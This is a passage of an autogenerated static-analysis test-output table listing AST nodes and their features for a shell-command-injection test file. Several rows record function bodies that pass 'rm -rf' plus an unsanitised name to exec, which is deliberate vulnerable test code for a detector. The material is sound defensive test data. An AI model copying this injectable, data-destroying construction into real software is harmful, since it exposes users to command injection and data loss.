./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:10:506:16 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:10:506:16 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:10:506:16 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:18:506:21 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:18:506:21 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:18:506:21 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:26:506:28 | imp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:26:506:28 | imp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:26:506:28 | imp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:26:506:34 | imp[name] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:26:506:34 | imp[name] | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:26:506:34 | imp[name] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:30:506:33 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:30:506:33 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:506:30:506:33 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:25 | module. ... itizer4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:25 | module. ... itizer4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:509:25 | module. ... itizer4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:547:1 | module. ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:547:1 | module. ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:1:547:1 | module. ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:8:509:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:8:509:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:8:509:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:16:509:25 | sanitizer4 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:16:509:25 | sanitizer4 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:16:509:25 | sanitizer4 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | cp | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | cp | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | this | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | this | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:509:28 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | 'arguments' object of anonymous function | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | exceptional return of anonymous function | enclosingFunctionBody | name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name cp exec rm -rf name cp exec rm -rf name isNaN name cp exec rm -rf name cp exec rm -rf name isNaN parseInt name 10 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name isNaN name 0 cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | exceptional return of anonymous function | enclosingFunctionName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | functio ... OK\\n\\t}\\n} | assignedToPropName | sanitizer4 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | functio ... OK\\n\\t}\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | functio ... OK\\n\\t}\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | functio ... OK\\n\\t}\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:509:29:547:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, 